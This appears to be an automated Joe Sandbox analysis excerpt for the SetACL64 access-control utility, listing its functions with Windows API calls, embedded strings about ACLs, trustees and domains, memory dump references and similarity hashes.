Download Yara Rule

APIs

WNetOpenEnumW.MPR ref: 00007FF68685ED54
WNetEnumResourceW.MPR ref: 00007FF68685EDE9
WNetCloseEnum.MPR ref: 00007FF68685F004
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F381
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F387
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F38D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F39F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F3A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F3AB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F3B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F3B7

Strings

Retrieving the remote path for mapped drive L<, xrefs: 00007FF68685F081
> failed with: , xrefs: 00007FF68685F0C8
GetUNCPathOfMappedDrive, xrefs: 00007FF68685F124

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Enum$CloseOpenResource
String ID: > failed with: $GetUNCPathOfMappedDrive$Retrieving the remote path for mapped drive L<
API String ID: 3788045339-1117730555
Opcode ID: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
Instruction ID: 897cc88404d4dfa97863e5fa0c13b52ffe57b4b43dfa5834001ac48dd7796fef
Opcode Fuzzy Hash: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
Instruction Fuzzy Hash: 171281E2B19781C1FA008B68E4493AD6362FF847A4F505239DB5D87AE9DF7DE880C710

Function 00007FF68685A2A0 Relevance: 25.7, APIs: 17, Instructions: 199COMMON

Download Yara Rule

APIs

IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A2F4
GetAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A30D
DeleteAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A338
GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A354
GetLengthSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A361
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A37F

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: DeleteErrorInformationLastLengthValid
String ID:
API String ID: 1967920013-0
Opcode ID: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
Instruction ID: 58542d67ca344bdf5a615978e665ffeef6b3c891745f053a4b965f1c3b398326
Opcode Fuzzy Hash: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
Instruction Fuzzy Hash: 598175A6A1C645C6EB509B62A59827E77A1BFC4B84F044039EE8F87765DF3EDC04C720

Function 00007FF68685AA60 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF68685AAAF

Part of subcall function 00007FF6868621D4: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF686862204
Part of subcall function 00007FF6868621D4: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68686220A

SysAllocString.OLEAUT32 ref: 00007FF68685AAFD
SysAllocString.OLEAUT32 ref: 00007FF68685ABA0
VariantInit.OLEAUT32 ref: 00007FF68685ABCD
SafeArrayGetLBound.OLEAUT32 ref: 00007FF68685AC29
SafeArrayGetUBound.OLEAUT32 ref: 00007FF68685AC45
SafeArrayAccessData.OLEAUT32 ref: 00007FF68685AC6C
SafeArrayUnaccessData.OLEAUT32 ref: 00007FF68685ACAB
VariantClear.OLEAUT32 ref: 00007FF68685ACB8
SysFreeString.OLEAUT32 ref: 00007FF68685ACD4
SysFreeString.OLEAUT32 ref: 00007FF68685AD13
SysFreeString.OLEAUT32 ref: 00007FF68685AD50

Strings

__systemsecurity=@, xrefs: 00007FF68685A6E8, 00007FF68685AAA8
GetSD, xrefs: 00007FF68685AAF6

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: String$ArraySafe$AllocFree$BoundConcurrency::cancel_current_taskDataVariant$AccessClearInitUnaccess
String ID: GetSD$__systemsecurity=@
API String ID: 2119716662-3672729512
Opcode ID: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
Instruction ID: e6dbbc69f34ff03896bbf94479b3e3d21ce669ca0c7432d3985f61394abfc725
Opcode Fuzzy Hash: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
Instruction Fuzzy Hash: CC917DB2A09B46C6EB149B21E45437963A4FF84B80F048439DE4E83BA5DF7EEC44C760

Function 00007FF686843623 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868443FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844401
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844407
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684440D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844413
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844419
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684441F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686844425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684442B

Strings

Prepare, xrefs: 00007FF68684366F
The object type was not specified., xrefs: 00007FF686843641

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Prepare$The object type was not specified.
API String ID: 3668304517-3861202280
Opcode ID: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
Instruction ID: 2d0ad0974eb36455030cfee97f42aca414ac69c5a7eb59dce5996f5ab247f440
Opcode Fuzzy Hash: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
Instruction Fuzzy Hash: 1A3196E1669783C1EA009B64D0993BE6321FF453D4F401539E75C866EADE7EE940C724

Function 00007FF686859200 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 392COMMON

Download Yara Rule

APIs

IsValidSid.ADVAPI32 ref: 00007FF68685941D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868597E6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868597F2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868597FE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686859804
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685980A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686859810
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686859816
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685981C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686859822

Part of subcall function 00007FF686860C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686860C35
Part of subcall function 00007FF686860C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF686860C58
Part of subcall function 00007FF686860C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686860CF3

Strings

Account <, xrefs: 00007FF686859481
ProcessACEsOfGivenDomains, xrefs: 00007FF686859567
> was not found in domain <, xrefs: 00007FF686859498

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_SetgloballocaleValidstd::locale::_
String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
API String ID: 2555488030-3371799133
Opcode ID: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
Instruction ID: e1cb55081dc4947951d65f08fd0d95871ad5d825abb67cf4411cb3b0837f2558
Opcode Fuzzy Hash: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
Instruction Fuzzy Hash: BD0281A2A18B81C5EF008F64D4883AD6761FF947A8F50523ADB5D47AE9DF7DE980C310

Function 00007FF68683D760 Relevance: 22.7, APIs: 15, Instructions: 223synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF68683D89C
ReleaseMutex.KERNEL32 ref: 00007FF68683D8AE
ResetEvent.KERNEL32 ref: 00007FF68683DA41
WaitForSingleObject.KERNEL32 ref: 00007FF68683DA51

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ObjectSingleWait$EventMutexReleaseReset
String ID:
API String ID: 4195719913-0
Opcode ID: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
Instruction ID: 6ffc553d7a659dbefa639c0182d432df865ea05768376e4391a8cd2db22c07c5
Opcode Fuzzy Hash: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
Instruction Fuzzy Hash: 3BB17FB2A18BC1C5EB208F25D9583ED2361FF48798F414639DA6C8B7E5DF399980C310

Function 00007FF686840520 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 464COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840C92
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840C98
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840C9E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840CA4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840CAA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840CB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686840CB6

Part of subcall function 00007FF686833F80: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834104
Part of subcall function 00007FF686833F80: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68683410A

Strings

No trustee specified., xrefs: 00007FF68684058F
Invalid access mode for this ACL type specified (e.g. you cannot add audit ACEs to the DACL, only to the SACL)., xrefs: 00007FF686840870
AddACE, xrefs: 00007FF6868405B9, 00007FF686840791, 00007FF68684089D, 00007FF6868409E1
Invalid inheritance specified., xrefs: 00007FF686840764
Audit ACEs cannot be set on shares., xrefs: 00007FF6868409B4

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: AddACE$Audit ACEs cannot be set on shares.$Invalid access mode for this ACL type specified (e.g. you cannot add audit ACEs to the DACL, only to the SACL).$Invalid inheritance specified.$No trustee specified.
API String ID: 3936042273-1410195417
Opcode ID: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
Instruction ID: 16501448b9b3021dd10c85ff3757a854934383daba2a0cd23c8e8e2dd7fd0fea
Opcode Fuzzy Hash: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
Instruction Fuzzy Hash: EE226BB2A18782C5EB10CF68D4447AE7365FF44798F804139DA4C97AA9DFBDE984C720

Function 00007FF6868626DC Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF6868626F2
GetModuleHandleW.KERNEL32 ref: 00007FF6868626FF
GetModuleHandleW.KERNEL32 ref: 00007FF686862714
GetProcAddress.KERNEL32 ref: 00007FF68686272C
GetProcAddress.KERNEL32 ref: 00007FF68686273F
CreateEventW.KERNEL32 ref: 00007FF68686276B
DeleteCriticalSection.KERNEL32 ref: 00007FF6868627B7
CloseHandle.KERNEL32 ref: 00007FF6868627C9

Strings

kernel32.dll, xrefs: 00007FF68686270D
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF6868626F8
SleepConditionVariableCS, xrefs: 00007FF686862722
WakeAllConditionVariable, xrefs: 00007FF686862732

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
Instruction ID: 935ec8524d3155687c59c2ab6d708839f6295308129ccb8b25f55b9599b215ee
Opcode Fuzzy Hash: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
Instruction Fuzzy Hash: 352165A0E19A07C5FE65DB24E86A5742361BF84744F54007DCA0ED66B5EF2EEC45C330

Function 00007FF6868423BF Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 316COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684285E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842864
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684286A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842876
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684287C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842882
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842888
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684288E

Strings

> is probably incorrect., xrefs: 00007FF686842459
Domain name <, xrefs: 00007FF686842442
AddDomain, xrefs: 00007FF6868424A6

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: > is probably incorrect.$AddDomain$Domain name <
API String ID: 3668304517-3402377043
Opcode ID: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
Instruction ID: 9ac1a748f5bf3dc28994894a0f16ffe34b2475cc45b218d3e1e7c429256f3d28
Opcode Fuzzy Hash: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
Instruction Fuzzy Hash: F1D160A2B19742C5EE10DB68D4593AD2326FF447A4F405239DB5C87AEADFBDE980C310

Function 00007FF686851760 Relevance: 18.5, APIs: 12, Instructions: 476COMMON

Download Yara Rule

APIs

ConvertSidToStringSidW.ADVAPI32 ref: 00007FF68685193F
LocalFree.KERNEL32 ref: 00007FF68685197A
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF686851B0D
LocalFree.KERNEL32 ref: 00007FF686851B4A
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF686851C8C
LocalFree.KERNEL32 ref: 00007FF686851CC9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686851DB9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686851DBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686851DCB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686851DD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686851DDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686851DE3

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ConvertFreeLocalString
String ID:
API String ID: 347880976-0
Opcode ID: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
Instruction ID: 96b6cde6fdc25a6b124a10be198633369c54c61a5a8bf31a48a2b6150b1bfb5e
Opcode Fuzzy Hash: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
Instruction Fuzzy Hash: 522291A2A18B81C5FB008B68E4443AD6771FF443A8F505239DF9D97AE9DF79E884C310

Function 00007FF68685A090 Relevance: 18.1, APIs: 12, Instructions: 145COMMON

Download Yara Rule

APIs

IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000,00007FF686859A60), ref: 00007FF68685A0E7

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Valid
String ID:
API String ID: 1304828667-0
Opcode ID: 562027f6ea632b8d146ccf656e1ba2dcc13df42484284c78869221e205c5226f
Instruction ID: ceb39bd6ad25b62fab73e098ed9e87cf16fcedaadcf656aed2cdc79b2027c3dc
Opcode Fuzzy Hash: 562027f6ea632b8d146ccf656e1ba2dcc13df42484284c78869221e205c5226f
Instruction Fuzzy Hash: 50518EA6A18646C6EB508B22E45963A73A5FFC8F85F044039DE4F87764DF3EE805C720

Function 00007FF6868421F7 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684286A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842876
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684287C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842882
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686842888
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684288E

Strings

No domain specified., xrefs: 00007FF686842213
AddDomain, xrefs: 00007FF68684223F

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: AddDomain$No domain specified.
API String ID: 3668304517-2536513783
Opcode ID: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
Instruction ID: 08d9cbe70bd113d8848302526ec335d98aff1a810ea4e7ffdce8c9dc2bc1cc99
Opcode Fuzzy Hash: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
Instruction Fuzzy Hash: 9751B7F2A69782D2EA109B28E4593AD6321FF44794F804539D74C879EADFBDE980C710

Function 00007FF6868349B0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 209COMMON

Download Yara Rule

APIs

VerQueryValueW.VERSION ref: 00007FF686834A5F
GetUserDefaultLangID.KERNEL32 ref: 00007FF686834B89
VerQueryValueW.VERSION ref: 00007FF686834C7D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834D12
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834D18
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834D1E

Strings

\StringFileInfo\%04X04B0\%s, xrefs: 00007FF686834B76
\StringFileInfo\%04x%04x\%s, xrefs: 00007FF686834A78
\VarFileInfo\Translation, xrefs: 00007FF686834A30

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$QueryValue$DefaultLangUser
String ID: \StringFileInfo\%04X04B0\%s$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
API String ID: 124864902-1470331934
Opcode ID: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
Instruction ID: bf872a5d809861bb79f671558f92984363356e7f55ea6e9ae099d84a0bae0fb6
Opcode Fuzzy Hash: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
Instruction Fuzzy Hash: D491A0B2A18B41C1EB00CF58E4442AE7761FF897A4F501239EA9D87BA9DF7DE584C710

Function 00007FF68683A7F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683A859
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF68683A8A4
